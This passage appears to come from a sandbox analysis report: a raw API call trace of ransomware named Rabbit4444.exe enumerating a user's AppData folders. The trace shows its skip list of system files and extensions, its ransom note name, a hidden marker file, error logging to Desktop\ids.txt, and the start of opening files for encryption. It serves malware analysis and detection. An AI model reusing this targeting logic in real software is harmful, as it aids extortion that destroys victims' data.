lpString1=0x130ebee, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0064.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0064.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108838 [0064.806] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122068 [0064.806] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x71318bbc, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0064.806] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.806] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.806] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0064.807] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0064.807] lstrcpyW (in: lpString1=0x130ebee, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0064.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0064.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116450 [0064.807] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122128 [0064.807] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ae5d2a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd5ae5d2a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd5ae5d2a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0064.807] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0064.807] lstrcpyW (in: lpString1=0x130ebee, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0064.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0064.807] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11dff0 [0064.807] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122108 [0064.807] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0x26ab0f83, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0064.807] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0064.808] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0064.808] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0064.808] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0064.808] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0064.808] lstrcpyW (in: lpString1=0x130ebee, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0064.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0064.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xca) returned 0x107170 [0064.808] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x1222a8 [0064.808] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0x26ab0f83, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0064.808] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.808] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.808] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.808] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.809] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.809] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.809] CloseHandle (hObject=0x2a0) returned 1 [0064.809] CloseHandle (hObject=0x2cc) returned 1 [0064.809] GetCurrentThreadId () returned 0xd98 [0064.809] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0064.809] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState" [0064.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107170 | out: hHeap=0xe0000) returned 1 [0064.809] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0064.809] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState" [0064.809] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\" [0064.809] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0064.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.811] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.814] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.815] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.815] CloseHandle (hObject=0x2cc) returned 1 [0064.815] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState") returned 100 [0064.815] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.815] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0xeff44b13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.815] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.816] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.816] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.816] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.816] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0xeff44b13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.816] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.816] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.816] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.816] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.816] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.816] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeff44b13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeff44b13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeff44b13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.816] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.816] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.816] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcc6143b0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xa970154, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa970154, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileCache_100_0_Data.bin", cAlternateFileName="TILECA~2.BIN")) returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="Rabbit4444.exe") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2=".") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="..") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="windows") returned -1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="bootmgr") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="pagefile.sys") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="boot") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="ids.txt") returned 1 [0064.816] lstrcmpiW (lpString1="TileCache_100_0_Data.bin", lpString2="NTUSER.DAT") returned 1 [0064.816] lstrcpyW (in: lpString1=0x130ec02, lpString2="TileCache_100_0_Data.bin" | out: lpString1="TileCache_100_0_Data.bin") returned="TileCache_100_0_Data.bin" [0064.816] lstrlenW (lpString="TileCache_100_0_Data.bin") returned 24 [0064.816] lstrlenW (lpString="Rabbit4444") returned 10 [0064.816] lstrcmpiW (lpString1="0_Data.bin", lpString2="Rabbit4444") returned -1 [0064.816] lstrlenW (lpString=".dll") returned 4 [0064.816] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0064.816] lstrlenW (lpString=".lnk") returned 4 [0064.816] lstrcmpiW (lpString1=".bin", lpString2=".lnk") returned -1 [0064.816] lstrlenW (lpString=".ini") returned 4 [0064.816] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0064.817] lstrlenW (lpString=".sys") returned 4 [0064.817] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0064.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Data.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\tilecache_100_0_data.bin"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0064.817] GetLastError () returned 0x20 [0064.817] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Data.bin _CreateFile error 32\r\n") returned 156 [0064.817] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Data.bin _CreateFile error 32\r\n") returned 156 [0064.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.817] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf03 [0064.817] WriteFile (in: hFile=0x2a0, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x9c, lpOverlapped=0x0) returned 1 [0064.819] CloseHandle (hObject=0x2a0) returned 1 [0064.819] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0064.819] CloseHandle (hObject=0x0) returned 0 [0064.819] CloseHandle (hObject=0xffffffff) returned 1 [0064.819] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcc6143b0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xa970154, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa970154, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x25a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileCache_100_0_Header.bin", cAlternateFileName="TILECA~1.BIN")) returned 1 [0064.819] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.819] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.819] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="Rabbit4444.exe") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2=".") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="..") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="windows") returned -1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="bootmgr") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="pagefile.sys") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="boot") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="ids.txt") returned 1 [0064.820] lstrcmpiW (lpString1="TileCache_100_0_Header.bin", lpString2="NTUSER.DAT") returned 1 [0064.820] lstrcpyW (in: lpString1=0x130ec02, lpString2="TileCache_100_0_Header.bin" | out: lpString1="TileCache_100_0_Header.bin") returned="TileCache_100_0_Header.bin" [0064.820] lstrlenW (lpString="TileCache_100_0_Header.bin") returned 26 [0064.820] lstrlenW (lpString="Rabbit4444") returned 10 [0064.820] lstrcmpiW (lpString1="Header.bin", lpString2="Rabbit4444") returned -1 [0064.820] lstrlenW (lpString=".dll") returned 4 [0064.820] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0064.820] lstrlenW (lpString=".lnk") returned 4 [0064.820] lstrcmpiW (lpString1=".bin", lpString2=".lnk") returned -1 [0064.820] lstrlenW (lpString=".ini") returned 4 [0064.820] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0064.820] lstrlenW (lpString=".sys") returned 4 [0064.820] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0064.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Header.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\tilecache_100_0_header.bin"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0064.820] GetLastError () returned 0x20 [0064.820] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Header.bin _CreateFile error 32\r\n") returned 158 [0064.821] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Header.bin _CreateFile error 32\r\n") returned 158 [0064.821] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.821] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf9f [0064.821] WriteFile (in: hFile=0x2a0, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x9e, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x9e, lpOverlapped=0x0) returned 1 [0064.823] CloseHandle (hObject=0x2a0) returned 1 [0064.823] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0064.823] CloseHandle (hObject=0x0) returned 0 [0064.823] CloseHandle (hObject=0xffffffff) returned 1 [0064.823] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26ab0f83, ftCreationTime.dwHighDateTime=0x1d4d5d0, ftLastAccessTime.dwLowDateTime=0x26ab0f83, ftLastAccessTime.dwHighDateTime=0x1d4d5d0, ftLastWriteTime.dwLowDateTime=0x26df83f3, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0xfcfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UnifiedTileCache.dat", cAlternateFileName="UNIFIE~1.DAT")) returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="Rabbit4444.exe") returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2=".") returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="..") returned 1 [0064.823] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="windows") returned -1 [0064.824] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="bootmgr") returned 1 [0064.824] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="pagefile.sys") returned 1 [0064.824] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="boot") returned 1 [0064.824] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="ids.txt") returned 1 [0064.824] lstrcmpiW (lpString1="UnifiedTileCache.dat", lpString2="NTUSER.DAT") returned 1 [0064.824] lstrcpyW (in: lpString1=0x130ec02, lpString2="UnifiedTileCache.dat" | out: lpString1="UnifiedTileCache.dat") returned="UnifiedTileCache.dat" [0064.824] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\UnifiedTileCache.dat", dwFileAttributes=0x0) returned 1 [0064.824] lstrlenW (lpString="UnifiedTileCache.dat") returned 20 [0064.824] lstrlenW (lpString="Rabbit4444") returned 10 [0064.824] lstrcmpiW (lpString1="eCache.dat", lpString2="Rabbit4444") returned -1 [0064.824] lstrlenW (lpString=".dll") returned 4 [0064.824] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0064.824] lstrlenW (lpString=".lnk") returned 4 [0064.824] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0064.824] lstrlenW (lpString=".ini") returned 4 [0064.824] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0064.824] lstrlenW (lpString=".sys") returned 4 [0064.824] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0064.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\UnifiedTileCache.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\unifiedtilecache.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0064.825] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0064.825] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15613534414) returned 1 [0064.825] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=64766) returned 1 [0064.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 